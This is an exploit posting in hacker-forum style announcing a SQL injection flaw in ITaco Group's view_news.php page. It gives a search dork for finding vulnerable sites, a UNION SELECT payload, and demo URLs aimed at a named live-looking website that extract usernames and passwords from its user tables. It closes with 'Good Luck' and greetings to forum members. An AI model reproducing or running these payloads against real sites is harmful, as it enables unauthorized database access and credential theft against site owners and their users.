============================================================================= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----------------------------------------------------------------------------- ############################################################################ # (+) Title : ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability # (+) Auther: Err0R # (+) Site : sa-hacker.com/vb # (+) Email : a5q(AT)hotmail(dot)com ############################################################################ ----------------------------------------------------------------------------- # (+) dork : intext"powered by itaco group" ----------------------------------------------------------------------------- # (+) Exploit : site/path/view_news.php?id=-999+union+select+1,2,3,4,5,6,7,8,9-- and you come the Inject (+) Demo :- Username : http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,userid,5,6,7,8,9+from+ardabil_ardabil_iec.userlog%20-- Passoword: http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,password,5,6,7,8,9+from+ardabil_ardabil_iec.users-- ----------------------------------------------------------------------------- ------------- Good Luck ------------- # (+) Greetz To :- ===================================================+ all member in www .Sa-hacker.com/vb | ++++++++++++++++++++++++++++++++++++++++++++ | Special To :Pepsi & Dr.X3 & wlhaan & X-SHADOW | ++++++++++++++++++++++++++++++++++++++++++++ | ===================================================+ ----------------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ =============================================================================
体验盒子
